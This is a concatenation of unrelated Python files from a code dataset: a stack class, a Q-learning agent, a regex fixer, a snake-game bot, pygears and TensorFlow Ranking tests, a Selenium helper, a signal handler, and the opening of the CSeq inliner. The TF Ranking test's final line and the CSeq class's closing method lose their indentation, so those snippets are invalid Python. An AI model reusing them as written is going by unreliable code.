# Dataset-export residue (not Python); commented out so the file can parse:
# content stringlengths 5 1.05M |
# |---|
"""
python 实现栈
"""
class Stack:
    """LIFO stack backed by a Python list; the list's tail is the stack top."""

    def __init__(self):
        # Internal storage; last element is the top of the stack.
        self.items = []

    def pop(self):
        """Remove and return the top item.

        Bug fix: the original removed the item but discarded the value.
        Raises IndexError on an empty stack (same as list.pop()).
        """
        return self.items.pop()

    def push(self, item):
        """Place ``item`` on top of the stack."""
        self.items.append(item)

    def peek(self):
        """Return the top item without removing it."""
        return self.items[-1]

    def size(self):
        """Return the number of stored items."""
        return len(self.items)

    def is_empty(self):
        """Return True when the stack holds no items."""
        return not self.items
if __name__ == '__main__':
    # Quick smoke test: push two items, discard the top, inspect the rest.
    demo = Stack()
    demo.push('h')
    demo.push('a')
    demo.pop()
    print(demo.peek())
    print(demo.size())
# ---- snippet separator (dataset residue) ----
import random
class LearningAgent:
    """Tabular Q-learning agent over ``nS`` states and ``nA`` actions.

    Q-value and visit-counter rows grow lazily per state as actions become
    known, and observed transitions are counted in ``nst`` so that the value
    of a successor state can be estimated empirically.
    """

    def __init__(self, nS, nA):
        if nS <= 0: raise ValueError("State Number")
        if nA <= 0: raise ValueError("Action Number")
        self.nS = nS
        self.nA = nA
        self.discFact = 0.8            # discount factor (gamma)
        self.epsiRate = 0.8 / nA       # per-visit increment of exploitation prob.
        self.epsi = [0 for _ in range(nS)]       # per-state exploitation probability
        self.Q = [[] for _ in range(nS)]         # Q[s][a], grown lazily by update()
        self.QCounter = [[] for _ in range(nS)]  # times action a was tried in s
        self.R = [0 for _ in range(nS)]          # running mean reward per state
        self.nst = [{} for _ in range(nS)]       # nst[s][a][s'] transition counts

    def update(self, st, lenAct):
        """Ensure Q/QCounter rows for ``st`` hold at least ``lenAct`` entries.

        Bug fix: the original used chained comparisons ``0 > x > limit`` which
        are always False, so invalid arguments were never rejected.
        """
        if not 0 <= st < self.nS: raise ValueError("State Number")
        if not 0 <= lenAct <= self.nA: raise ValueError("Action Number")
        missing = lenAct - len(self.Q[st])
        if missing > 0:
            self.Q[st].extend(0 for _ in range(missing))
            self.QCounter[st].extend(0 for _ in range(missing))

    def learnUpdate(self, ost, nst, a):
        """Record one observed transition ost --a--> nst."""
        if not 0 <= nst < self.nS: raise ValueError("State Number")
        # NOTE(review): as in the original, the action index ``a`` is passed
        # as the row length here, so this only grows the row up to ``a``
        # entries; callers are expected to have sized the row via a prior
        # select* call before learn() indexes QCounter[ost][a].
        self.update(ost, a)
        branch = self.nst[ost].setdefault(a, {})
        branch[nst] = branch.get(nst, 0) + 1

    def selectactiontolearn(self, st, aa):
        """Pick a training action: exploit (argmax Q) with probability
        ``epsi[st]``, otherwise pick among the least-tried actions."""
        self.update(st, len(aa))
        if random.random() < self.epsi[st]:
            best = max(self.Q[st][:len(aa)])
            candidates = [a for a in range(len(aa)) if self.Q[st][a] == best]
        else:
            least = min(self.QCounter[st][:len(aa)])
            candidates = [a for a in range(len(aa)) if self.QCounter[st][a] == least]
        return random.choice(candidates)

    def selectactiontoexecute(self, st, aa):
        """Greedy action for execution (argmax of Q; ties go to lowest index)."""
        self.update(st, len(aa))
        return max(range(len(aa)), key=self.Q[st].__getitem__)

    def V(self, ost, a):
        """Expected best successor value after ``a`` in ``ost``, weighted by
        observed transition counts. States with no Q entries contribute 0."""
        total = 0
        weight = 0
        for succ, count in self.nst[ost][a].items():
            if self.Q[succ]:
                total += max(self.Q[succ]) * count
            weight += count
        return total / weight

    def learn(self, ost, nst, a, r):
        """One Q-learning update for transition (ost, a) -> nst with reward r."""
        self.learnUpdate(ost, nst, a)
        visits = sum(self.QCounter[ost])
        self.QCounter[ost][a] += 1
        if visits < self.nA:
            # Ramp up exploitation during the first nA visits of this state.
            self.epsi[ost] += self.epsiRate
        self.R[ost] = (self.R[ost] * visits + r) / (visits + 1)
        self.Q[ost][a] = self.R[ost] + self.discFact * self.V(ost, a)
# ---- snippet separator (dataset residue) ----
'''
Define a simple "spelling correction" function correct() that takes a string and sees to it that
1) two or more occurrences of the space character is compressed into one, and
2) inserts an extra space after a period if the period is directly followed by a letter.
E.g. correct("This is very funny and cool.Indeed!") should return "This is very funny and cool. Indeed!"
Tip: Use regular expressions!
'''
import re
def correct(x):
    """Return ``x`` with simple spacing fixes applied.

    1) Inserts a space after a period that is directly followed by a letter.
    2) Compresses runs of two or more spaces into a single space.

    Bug fixes: the original used a Python-2 ``print`` statement and never
    returned the result, and it appended a space after *every* period
    (including string-final ones) instead of only before a letter.
    """
    x = re.sub(r'\.(?=[A-Za-z])', '. ', x)  # space after period only before a letter
    x = re.sub(r' {2,}', ' ', x)            # collapse runs of spaces
    return x

correct("This is very funny and cool.Indeed!")
# ---- snippet separator (dataset residue) ----
from random import choice
from snakegame.common import *
def bfs(board, x, y, find):
    """Breadth-first flood fill over the wrapping board starting at (x, y).

    ``find`` selects both the stop condition and the return shape:
      "a"  -- apple search: returns the sorted node list when an apple ("*")
              node was reached, otherwise the string " " + str(nodes)
              (callers detect the leading space/non-"[" as a sentinel);
      "s"  -- safety scan: returns the raw node list (frontier capped at 300);
      else -- returns the count of reachable cells minus one (capped at 50).
    """
    nodes=[[1, 0, x, y, ""]]
    # node format is [1=nothing 0=apple (for sorting reasons),
    # distance from start, x, y, dirs used to get there]
    height=len(board)
    width = len(board[0])
    # NOTE(review): the loop condition is kept as a string and eval()'d each
    # iteration; safe only because these strings are hard-coded — a lambda
    # would be cleaner and avoid eval entirely.
    if find == "a":
        condition = "found < 8"
    elif find == "s":
        condition = "len(nodes) < 300"
    else:
        condition = "len(nodes) < 51"
    TARGET="*"   # apple cell
    ENTRY="."    # free cell
    DIRS={"U":[-1,0], "D":[1,0], "L":[0,-1], "R":[0,1]}
    found=steps=0
    explored=[]  # nodes already expanded
    checker=[]   # [x, y] pairs already queued (visited set)
    while eval(condition):
        steps+=1
        todo=[]
        for node in nodes:
            if node not in explored:
                x,y, prevdir=node[2],node[3], node[4]
                for dr, (dy, dx) in DIRS.items():
                    # NOTE(review): nx wraps by height and ny by width — this
                    # looks swapped, but it is at least self-consistent with
                    # the board[ny][nx] indexing below; confirm against the
                    # engine's geometry (square boards would mask the bug).
                    nx=(x+dx)%height
                    ny=(y+dy)%width
                    if board[ny][nx] == ENTRY:
                        a=[1, steps, nx, ny, (prevdir+dr)]
                        if a[2:4] not in checker:
                            todo.append(a)
                            checker.append(a[2:4])
                    elif board[ny][nx] == TARGET:
                        a=[0, steps, nx, ny, (prevdir+dr)]
                        if a[2:4] not in checker:
                            todo.append(a)
                            checker.append(a[2:4])
                            found+=1
                explored.append(node)
        if not todo:
            # Frontier exhausted: everything reachable has been visited.
            break
        for item in todo:
            nodes.append(item)
    if find == "a":
        # An apple was found iff the best (sorted-first) node has marker 0.
        if sorted(nodes)[0][0]==0:
            return sorted(nodes)
        else: return " " + str(nodes)
    elif find == "s":
        return nodes
    else:
        return len(nodes)-1
def best_no_app(choices):
    """Return the first-move direction ("U"/"D"/"L"/"R") that the most
    candidate routes begin with; defaults to "U" when nothing scores."""
    # Note: the original loop variable shadowed random.choice; renamed here.
    tally = {"U": 0, "D": 0, "L": 0, "R": 0}
    for option in choices:
        route = option[-1]
        if route:
            tally[route[0]] += 1
    # max() returns the first key in insertion order on ties, which matches
    # the original strictly-greater scan starting from "U".
    return max(tally, key=tally.get)
def win(tries, safety):
    """Among routes whose follow-up safety count exceeds ``tries``, return the
    first-move direction of the one with the shortest distance (stats[1]).
    Returns "" when no route qualifies."""
    best_distance = 200
    chosen = ""
    for stats, moves in safety:
        if moves > tries and stats[1] < best_distance:
            best_distance = stats[1]
            chosen = stats[4][0]
    return chosen
def best_with_app(board, choices, x, y, w, h):
    """Choose a direction when apple routes exist among ``choices``.

    ``directions`` presumably comes from the ``snakegame.common`` star import
    — TODO confirm its (dx, dy) convention against the engine.
    """
    # Score each apple route (marker 0) by how much free space remains after
    # taking its first step.
    safety = []
    for node in choices:
        route = node[-1]
        if route and not node[0]:
            step = directions[route[0]]
            reachable = bfs(board, (step[0] + x) % w, (step[1] + y) % h, "")
            safety.append([node, reachable])
    # Consider ourselves trapped unless some first step keeps >49 cells open.
    trapped = 1
    for node, _ in safety:
        step = directions[node[-1][0]]
        if bfs(board, x + step[0], y + step[1], "") > 49:
            trapped = 0
    if trapped:
        return best_no_app(choices)
    chosen = win(20, safety)
    if chosen:
        return chosen
    return "U"
def matt_old_bot(board, val):
    """Bot entry point: chase apples when reachable, otherwise play safe."""
    x, y = val[0], val[1]
    h = len(board)
    w = len(board[0])
    choices = bfs(board, x, y, "a")  # finds apples; if none, finds moves
    if str(choices)[0] != "[":
        # bfs returned its " ..." string sentinel: no apples reachable.
        # NOTE(review): eval() here re-parses bfs's own repr of its node
        # list — internal data only, but a structured return would be safer.
        return best_no_app(eval(choices[1:]))  # safety mode
    return best_with_app(board, choices, x, y, w, h)
def safe_bot(board, val):
    """Bot entry point: scan for enemy snakes; retreat to safety when any exist.

    ``board`` is a grid of single-character cells and ``val`` the head (x, y).
    Cells counted as harmless are free (.), apple (*), and our own snake's
    upper/lower-case characters.

    Bug fix: removed the stray debug ``print(board, val)`` that ran on every
    single move.
    """
    x, y = val
    me = board[y][x]
    good = ".*" + me + me.lower()
    enemies = any(cell not in good for line in board for cell in line)
    if enemies:
        choices = bfs(board, x, y, "s")
        return best_no_app(choices)
    return matt_old_bot(board, (x, y))
# Test code to run the snake game.
# Leave the if statement as is, otherwise I won't be able to run your bot with
# the other bots.
if __name__ == '__main__':
    # Local import so the bots above can be imported without pyglet installed.
    from snakegame.engines.pyglet import PygletEngine
    # Presumably a 25x25 wrapping board (third argument looks like a pixel
    # size or frame rate — TODO confirm against PygletEngine's signature).
    p = PygletEngine(25, 25, 50, wrap=True)
    p.add_bot(matt_old_bot)
    p.add_bot(safe_bot)
    p.run()
# ---- snippet separator (dataset residue) ----
import pytest
from pygears import gear, Intf
from pygears.typing import Tuple, Uint, Integer
from pygears.core.infer_ftypes import TypeMatchError, infer_ftypes
from pygears.util.test_utils import equal_on_nonspace
from pygears.core.gear import GearArgsNotSpecified
def test_templated_type_deduction_multi_related_templates_fail():
    # "T1" appears twice in the din template but is matched against two
    # different widths (Uint[1] and Uint[2]); deduction must fail with an
    # ambiguity error. Comparison ignores whitespace (equal_on_nonspace).
    expected_err_text = """Ambiguous match for parameter "T1": Uint[2] and Uint[1]
- when matching Tuple[Uint[1], Uint[2], Uint[2]] to Tuple['T1', Uint['T2'], 'T1']
- when deducing type for argument "din" """
    params = {
        'din': Tuple['T1', Uint['T2'], 'T1'],
        'return': Tuple['T1', 'T2']
    }
    args = {'din': Tuple[Uint[1], Uint[2], Uint[2]]}
    with pytest.raises(TypeMatchError) as excinfo:
        infer_ftypes(params, args)
    assert equal_on_nonspace(str(excinfo.value), expected_err_text)
def test_incomplete_type():
    # The abstract Integer type cannot satisfy the b't' return reference
    # (pygears uses byte strings as template back-references).
    expected_err_text = """Incomplete type: Integer
- when resolving return type \"t\""""
    params = {'t': Integer, 'return': b't'}
    args = {}
    with pytest.raises(TypeMatchError) as excinfo:
        infer_ftypes(params, args)
    assert equal_on_nonspace(str(excinfo.value), expected_err_text)
def test_incomplete_argument():
    # Instantiating a gear whose input interface carries an unresolved
    # (abstract) type must raise GearArgsNotSpecified.
    @gear
    def test(din) -> b'din':
        pass

    expected_err_text = """Input argument "din" has unresolved type "Integer"\n - when instantiating "test" """
    with pytest.raises(GearArgsNotSpecified) as excinfo:
        test(Intf(Integer))
    assert equal_on_nonspace(str(excinfo.value), expected_err_text)
def test_unresolved_partial_err():
    """Piping a partially-applied consumer (unresolved args) must raise."""
    @gear
    def producer(din) -> b'din':
        pass

    @gear
    def consumer(din1, din2) -> b'din':
        pass

    with pytest.raises(GearArgsNotSpecified):
        consumer(Intf(Integer)) | producer
# ---- snippet separator (dataset residue) ----
import logging
class SeleniumUtils(object):
    """Helper routines for common Selenium element queries."""

    def __init__(self):
        super(SeleniumUtils, self).__init__()

    @classmethod
    def find_a_href(cls, categories, param):
        """Return the href of the first anchor whose text matches the
        "Smart Watches" label, or None when no anchor matches.

        ``param`` is accepted for interface compatibility but is currently
        unused — TODO: presumably the match target was meant to be ``param``;
        confirm with callers before generalizing.
        """
        # Fix: classmethod's first argument renamed self -> cls.
        for category in categories:
            href = category.get_attribute("href")
            text = category.text
            # Bug fix: an empty text matched every anchor, because
            # "" in "Smart Watches" is True. Require non-empty text.
            if text and text in "Smart Watches":
                logging.debug("find a's title <%s>" % text)
                return href
        return None
# ---- snippet separator (dataset residue) ----
# Copyright 2018 The TensorFlow Ranking Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Input data processing tests for ranking library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl.testing import parameterized
import numpy as np
from google.protobuf import text_format
from tensorflow.core.example import example_pb2
from tensorflow.python.client import session
from tensorflow.python.data.ops import readers
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.lib.io import file_io
from tensorflow.python.lib.io import tf_record
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import queue_runner
from tensorflow.python.util.protobuf import compare
from tensorflow_ranking.python import data as data_lib
SEQ_EXAMPLE_PROTO_1 = text_format.Parse(
"""
context {
feature {
key: "query_length"
value { int64_list { value: 3 } }
}
}
feature_lists {
feature_list {
key: "unigrams"
value {
feature { bytes_list { value: "tensorflow" } }
feature { bytes_list { value: ["learning", "to", "rank"] } }
}
}
feature_list {
key: "utility"
value {
feature { float_list { value: 0.0 } }
feature { float_list { value: 1.0 } }
}
}
}
""", example_pb2.SequenceExample())
SEQ_EXAMPLE_PROTO_2 = text_format.Parse(
"""
context {
feature {
key: "query_length"
value { int64_list { value: 2 } }
}
}
feature_lists {
feature_list {
key: "unigrams"
value {
feature { bytes_list { value: "gbdt" } }
feature { }
}
}
feature_list {
key: "utility"
value {
feature { float_list { value: 0.0 } }
feature { float_list { value: 0.0 } }
}
}
}
""", example_pb2.SequenceExample())
CONTEXT_FEATURE_SPEC = {
"query_length":
parsing_ops.FixedLenFeature([1], dtypes.int64, default_value=[0])
}
EXAMPLE_FEATURE_SPEC = {
"unigrams":
parsing_ops.VarLenFeature(dtypes.string),
"utility":
parsing_ops.FixedLenFeature([1], dtypes.float32, default_value=[0.])
}
LIBSVM_DATA = """2 qid:1 1:0.1 3:0.3 4:-0.4
1 qid:1 1:0.12 4:0.24 5:0.5
0 qid:1 2:0.13
"""
class SequenceExampleTest(compare.ProtoAssertions, test.TestCase,
                          parameterized.TestCase):
    """Tests for parsing ranking data stored as tf.SequenceExample protos."""

    def test_parse_from_sequence_example(self):
        # Batch of two protos with list_size=2: no padding/truncation needed.
        features = data_lib.parse_from_sequence_example(
            ops.convert_to_tensor([
                SEQ_EXAMPLE_PROTO_1.SerializeToString(),
                SEQ_EXAMPLE_PROTO_2.SerializeToString(),
            ]),
            list_size=2,
            context_feature_spec=CONTEXT_FEATURE_SPEC,
            example_feature_spec=EXAMPLE_FEATURE_SPEC)
        with session.Session() as sess:
            sess.run(variables.local_variables_initializer())
            queue_runner.start_queue_runners()
            feature_map = sess.run(features)
            self.assertEqual(
                sorted(feature_map), ["query_length", "unigrams", "utility"])
            # "unigrams" is sparse with shape [batch, list_size, max_tokens].
            self.assertAllEqual(feature_map["unigrams"].dense_shape, [2, 2, 3])
            self.assertAllEqual(
                feature_map["unigrams"].indices,
                [[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 1, 2], [1, 0, 0]])
            self.assertAllEqual(feature_map["unigrams"].values,
                                [b"tensorflow", b"learning", b"to", b"rank", b"gbdt"])
            self.assertAllEqual(feature_map["query_length"], [[3], [2]])
            self.assertAllEqual(feature_map["utility"], [[[0.], [1.]], [[0.], [0.]]])

    def test_parse_from_sequence_example_slice(self):
        # list_size=1 truncates PROTO_1's two frames down to the first one.
        features = data_lib.parse_from_sequence_example(
            ops.convert_to_tensor([
                SEQ_EXAMPLE_PROTO_1.SerializeToString(),
            ]),
            list_size=1,
            context_feature_spec=CONTEXT_FEATURE_SPEC,
            example_feature_spec=EXAMPLE_FEATURE_SPEC)
        with session.Session() as sess:
            sess.run(variables.local_variables_initializer())
            queue_runner.start_queue_runners()
            feature_map = sess.run(features)
            self.assertEqual(
                sorted(feature_map), ["query_length", "unigrams", "utility"])
            self.assertAllEqual(feature_map["unigrams"].dense_shape, [1, 1, 3])
            self.assertAllEqual(feature_map["unigrams"].indices, [[0, 0, 0]])
            self.assertAllEqual(feature_map["unigrams"].values, [b"tensorflow"])
            self.assertAllEqual(feature_map["query_length"], [[3]])
            self.assertAllEqual(feature_map["utility"], [[[0.]]])

    def test_parse_from_sequence_example_pad(self):
        # list_size=3 pads PROTO_1's two frames with spec default values.
        features = data_lib.parse_from_sequence_example(
            ops.convert_to_tensor([
                SEQ_EXAMPLE_PROTO_1.SerializeToString(),
            ]),
            list_size=3,
            context_feature_spec=CONTEXT_FEATURE_SPEC,
            example_feature_spec=EXAMPLE_FEATURE_SPEC)
        with session.Session() as sess:
            sess.run(variables.local_variables_initializer())
            queue_runner.start_queue_runners()
            feature_map = sess.run(features)
            self.assertEqual(
                sorted(feature_map), ["query_length", "unigrams", "utility"])
            self.assertAllEqual(feature_map["query_length"], [[3]])
            self.assertAllEqual(feature_map["unigrams"].dense_shape, [1, 3, 3])
            self.assertAllEqual(feature_map["unigrams"].indices,
                                [[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 1, 2]])
            self.assertAllEqual(feature_map["unigrams"].values,
                                [b"tensorflow", b"learning", b"to", b"rank"])
            self.assertAllEqual(feature_map["utility"], [[[0.], [1.], [0.]]])

    def test_parse_from_sequence_example_missing_framei_exception(self):
        # An empty frame for a FixedLenFeature spec must raise at parse time.
        missing_frame_proto = text_format.Parse(
            """
            feature_lists {
              feature_list {
                key: "utility"
                value {
                  feature { float_list { value: 0.0 } }
                  feature { }
                }
              }
            }
            """, example_pb2.SequenceExample())
        features = data_lib.parse_from_sequence_example(
            ops.convert_to_tensor([missing_frame_proto.SerializeToString()]),
            list_size=2,
            context_feature_spec=None,
            example_feature_spec={"utility": EXAMPLE_FEATURE_SPEC["utility"]})
        with session.Session() as sess:
            sess.run(variables.local_variables_initializer())
            queue_runner.start_queue_runners()
            with self.assertRaisesRegexp(
                    errors.InvalidArgumentError,
                    r"Unexpected number of elements in feature utility"):
                sess.run(features)

    @parameterized.named_parameters(("with_sloppy_ordering", True),
                                    ("with_deterministic_ordering", False))
    def test_read_batched_sequence_example_dataset(self, sloppy_ordering):
        # Save protos in a TFRecord file in a temp folder.
        serialized_sequence_examples = [
            SEQ_EXAMPLE_PROTO_1.SerializeToString(),
            SEQ_EXAMPLE_PROTO_2.SerializeToString()
        ] * 100
        data_dir = test.get_temp_dir()
        data_file = os.path.join(data_dir, "test_sequence_example.tfrecord")
        if file_io.file_exists(data_file):
            file_io.delete_file(data_file)
        with tf_record.TFRecordWriter(data_file) as writer:
            for s in serialized_sequence_examples:
                writer.write(s)
        batched_dataset = data_lib.read_batched_sequence_example_dataset(
            file_pattern=data_file,
            batch_size=2,
            list_size=2,
            context_feature_spec=CONTEXT_FEATURE_SPEC,
            example_feature_spec=EXAMPLE_FEATURE_SPEC,
            reader=readers.TFRecordDataset,
            shuffle=False,
            sloppy_ordering=sloppy_ordering)
        features = batched_dataset.make_one_shot_iterator().get_next()
        self.assertAllEqual(
            sorted(features), ["query_length", "unigrams", "utility"])
        # Check static shapes for dense tensors.
        self.assertAllEqual([2, 1], features["query_length"].get_shape().as_list())
        self.assertAllEqual([2, 2, 1], features["utility"].get_shape().as_list())
        with session.Session() as sess:
            sess.run(variables.local_variables_initializer())
            queue_runner.start_queue_runners()
            feature_map = sess.run(features)
            # Test dense_shape, indices and values for a SparseTensor.
            self.assertAllEqual(feature_map["unigrams"].dense_shape, [2, 2, 3])
            self.assertAllEqual(
                feature_map["unigrams"].indices,
                [[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 1, 2], [1, 0, 0]])
            self.assertAllEqual(feature_map["unigrams"].values,
                                [b"tensorflow", b"learning", b"to", b"rank", b"gbdt"])
            # Check values directly for dense tensors.
            self.assertAllEqual(feature_map["query_length"], [[3], [2]])
            self.assertAllEqual(feature_map["utility"], [[[0.], [1.0]], [[0.], [0.]]])

    def test_sequence_example_serving_input_receiver_fn(self):
        # The serving fn accepts serialized protos through a receiver tensor.
        serving_input_receiver_fn = (
            data_lib.build_sequence_example_serving_input_receiver_fn(
                input_size=2,
                context_feature_spec=CONTEXT_FEATURE_SPEC,
                example_feature_spec=EXAMPLE_FEATURE_SPEC))
        serving_input_receiver = serving_input_receiver_fn()
        self.assertAllEqual(
            sorted(serving_input_receiver.features),
            ["query_length", "unigrams", "utility"])
        self.assertEqual(
            sorted(serving_input_receiver.receiver_tensors.keys()),
            ["sequence_example"])
        with session.Session() as sess:
            sess.run(variables.local_variables_initializer())
            queue_runner.start_queue_runners()
            feature_map = sess.run(
                serving_input_receiver.features,
                feed_dict={
                    serving_input_receiver.receiver_tensors["sequence_example"].name:
                    [
                        SEQ_EXAMPLE_PROTO_1.SerializeToString(),
                        SEQ_EXAMPLE_PROTO_2.SerializeToString()
                    ]
                })
            # Test dense_shape, indices and values for a SparseTensor.
            self.assertAllEqual(feature_map["unigrams"].dense_shape, [2, 2, 3])
            self.assertAllEqual(
                feature_map["unigrams"].indices,
                [[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 1, 2], [1, 0, 0]])
            self.assertAllEqual(feature_map["unigrams"].values,
                                [b"tensorflow", b"learning", b"to", b"rank", b"gbdt"])
            # Check values directly for dense tensors.
            self.assertAllEqual(feature_map["query_length"], [[3], [2]])
            self.assertAllEqual(feature_map["utility"], [[[0.], [1.0]], [[0.], [0.]]])
class LibSVMUnitTest(test.TestCase, parameterized.TestCase):
    """Tests for the LibSVM parsing helpers in data_lib."""

    def test_libsvm_parse_line(self):
        # One LibSVM line -> (qid, {feature_id: value, "label": relevance}).
        data = "1 qid:10 32:0.14 48:0.97 51:0.45"
        qid, features = data_lib._libsvm_parse_line(data)
        self.assertEqual(qid, 10)
        self.assertDictEqual(
            features,
            {"32": 0.14, "48": 0.97, "51": 0.45, "label": 1.0}
        )

    def test_libsvm_generate(self):
        # Three docs padded to list_size=4; the padded slot gets label -1.
        doc_list = [
            {"1": 0.1, "3": 0.3, "4": -0.4, "label": 2.0},
            {"1": 0.12, "4": 0.24, "5": 0.5, "label": 1.0},
            {"2": 0.13, "label": 0.0},
        ]
        want = {
            "1": np.array([[0.1], [0.], [0.12], [0.]], dtype=np.float32),
            "2": np.array([[0.], [0.13], [0.], [0.]], dtype=np.float32),
            "3": np.array([[0.3], [0.], [0.], [0.]], dtype=np.float32),
            "4": np.array([[-0.4], [0.], [0.24], [0.]], dtype=np.float32),
            "5": np.array([[0.], [0.], [0.5], [0.]], dtype=np.float32),
        }
        # The expected document order below depends on this fixed seed.
        np.random.seed(10)
        features, labels = data_lib._libsvm_generate(
            num_features=5, list_size=4, doc_list=doc_list)
        self.assertAllEqual(labels, [2.0, 0.0, 1.0, -1.0])
        self.assertAllEqual(
            sorted(features.keys()),
            sorted(want.keys())
        )
        for k in sorted(want):
            self.assertAllEqual(features.get(k), want.get(k))

    def test_libsvm_generator(self):
        # Write LIBSVM_DATA to a temp file and check the first generated batch.
        data_dir = test.get_temp_dir()
        data_file = os.path.join(data_dir, "test_libvsvm.txt")
        if file_io.file_exists(data_file):
            file_io.delete_file(data_file)
        with open(data_file, "wt") as writer:
            writer.write(LIBSVM_DATA)
        want = {
            "1": np.array([[0.1], [0.], [0.12], [0.]], dtype=np.float32),
            "2": np.array([[0.], [0.13], [0.], [0.]], dtype=np.float32),
            "3": np.array([[0.3], [0.], [0.], [0.]], dtype=np.float32),
            "4": np.array([[-0.4], [0.], [0.24], [0.]], dtype=np.float32),
            "5": np.array([[0.], [0.], [0.5], [0.]], dtype=np.float32),
        }
        reader = data_lib.libsvm_generator(data_file, 5, 4, seed=10)
        for features, labels in reader():
            self.assertAllEqual(labels, [2.0, 0., 1.0, -1.0])
            self.assertAllEqual(
                sorted(features.keys()),
                sorted(want.keys())
            )
            for k in sorted(want):
                self.assertAllEqual(features.get(k), want.get(k))
            # The generator is endless; one batch is enough here.
            break
if __name__ == "__main__":
test.main()
# ---- snippet separator (dataset residue) ----
###################################################################################################
# Copyright © 2021 Neal Meswania
# Lisence: MIT
###################################################################################################
import signal
import sys
###################################################################################################
###################################################################################################
###################################################################################################
class SignalHandler:
    """Installs a SIGINT (Ctrl-C) handler that tears down the main task."""

    def __init__(self, main_task):
        # Keep a reference so the handler can release it on shutdown.
        self._main_task = main_task

    def Assign(self):
        """Route SIGINT to this object's handler."""
        signal.signal(signal.SIGINT, self._HandleSignal)

    def _HandleSignal(self, sig, frame):
        # Drop the task reference, then terminate with exit status 0.
        del self._main_task
        sys.exit(0)
###################################################################################################
###################################################################################################
###################################################################################################
# ---- snippet separator (dataset residue) ----
""" CSeq function inlining module
written by Omar Inverso, Gennaro Parlato, University of Southampton.
maintained by Truc Nguyen Lam, University of Southampton.
"""
VERSION = 'inliner-0.1-2016.08.16'
# VERSION = 'inliner-0.0-2014.10.19'
# VERSION = 'inliner-0.0-2014.07.15'
#VERSION = 'inliner-0.0-2014.12.24' # CSeq-1.0beta
#VERSION = 'inliner-0.0-2014.10.31' # CSeq-Lazy-0.6: newseq-0.6a, newseq-0.6c, SVCOMP15
#VERSION = 'inliner-0.0-2014.10.28'
#VERSION = 'inliner-0.0-2014.03.14'
#VERSION = 'inliner-0.0-2014.03.06 (CSeq-Lazy-0.2)'
#VERSION = 'inliner-0.0-2014.02.27'
#VERSION = 'inliner-0.0-2014.02.25'
#VERSION = 'inliner-0.0-2013.12.02'
#VERSION = 'inliner-0.0-2013.10.24-Gennaro-Omar'
"""
Transformations:
- inlining of all the function calls,
for functions which body is defined (except main() and __CSEQ_atomic_ functions)
- renames main() to main_thread()
- in threads:
- pthread_exit; are converted into goto thread_exit; (pthread_exit() argument is ignored)
- return; and return value; are converted into goto thread_exit; (return value is ignored)
- local variables are converted into static local variables (to hold the value across context switches)
Prerequisites:
- no function calls in if, while, for conditions (e.g. if(f(g)), while(cond), ...) ???
(use module extractor.py)
- no overlapping variable names as in regression testcase 102
(use module varnames.py)
Limitations:
- two function in the same expression, nested, e.g.: g(f(x));
TODO:
- make nondet-static option work
- limit recursion depth (otherwise parsing recursive functions will give a python stack overflow)
- handle f(g(x)): g(x) is in n.args therefore at the moment would not be inlined?
Changelog:
2017.08.17 preserve return arguments and pthread_exit arguments for thread
2016.12.20 accomplish todo 3 - rename labels (& corresponding gotos) in inlined blocks of code to avoid label duplication
2016.12.02 add option to keep parameter passing atomically
2016.10.05 don't want to use __cs_init_scalar on pthread types (see initVar function)
2016.09.27 fix bug: problem of init dynamic size array
2016.09.27 fix bug: multiple inline of two functions use the same (global) variable as parameter
2016.09.16 add option to keep static array declaration (no cast to pointer)
2016.08.16 __cs_init_scalar less ubiquitous
2015.10.19 fix in _inlineFunction
2015.07.16 fix inlining function in a label statement (Truc)
2015.07.15 fixed linemapping for inlined function blocks + expanded parameter passing (Truc)
2014.12.09 further code refactory to match the new organisation of the CSeq framework
2014.10.31 bugfix: when dealing with expressions such as: if(!f(x)) would inline the function twice
2014.10.28 inlining optimization: ....
2014.03.14 further code refactory to match module.Module class interface
2014.03.09 bugfix: external module varnames.py to fix regression overlapping variable names (see regression/102,103 )
2014.03.06 bugfix: inliner wrong handling array as parameters (see regression/100_inline_struct_array.c)
2014.02.27 improved indentation in inlined blocks
2014.02.25 switched to module.Module base class for modules
2013.12.02 bugfix: local struct variables not converted into static struct variables (e.g. struct a --> static struct a;)
"""
import copy,re
import pycparser.c_parser, pycparser.c_ast, pycparser.c_generator
from pycparser import c_ast
import core.common, core.module, core.parser, core.utils
class inliner(core.module.Translator):
    """CSeq function-inlining translator (see the module header for details)."""
    # NOTE(review): these are class-level mutable attributes, shared across
    # instances unless shadowed; confirm the framework creates one instance
    # per translation.
    functionlines = {}          # map function names to sets of line numbers
    linestofunctions = {}       # map from lines to function names
    ##__functionsToBeInlined = [] # ids of all the functions to be inlined
    currentFunction = ['']      # stack of function names currently being visited
    currentFunctionParams = []  # while parsing a function call, the list of actual parameters
    inlinedStack = []           # inlined function text to add before a statement
    indexStack = []             # current index (= functionname_inliningcountforthisfunction) used for labels and gotos
    parametersToRemoveStack = [[]]
    switchTo = []               # fix to avoid inlining twice when two functions take the same global var as parameter (pfscan)
    __parsingStruct = False     # True while generating a struct body
    # old
    funcInlinedCount = {}       # number of times a function call has been inlined, by function
    recursivebound = 1          # recursion depth bound; same as the unwind bound
    #
    keepstaticarray = False     # option: keep static arrays (no cast to pointer)
    atomicparameter = False     # option: keep parameter passing atomic
    __globalMemoryAccessed = False  # set while the current statement touches a global
    __hasatomicbegin = False        # current statement contained __CSEQ_atomic_begin
    __canbemerged = {}              # per-function: atomic begin without global access
    __nondet_static = False         # option: backend support of nondet static variables
    # Keep return and pthread_exit argument of each thread.
    __exit_args = {}
def init(self):
self.addInputParam('keepstaticarray', 'keep static array, do not change to pointer version', '', False, True)
self.addInputParam('atomicparameter', 'keep passing parameter atomic', '', False, True)
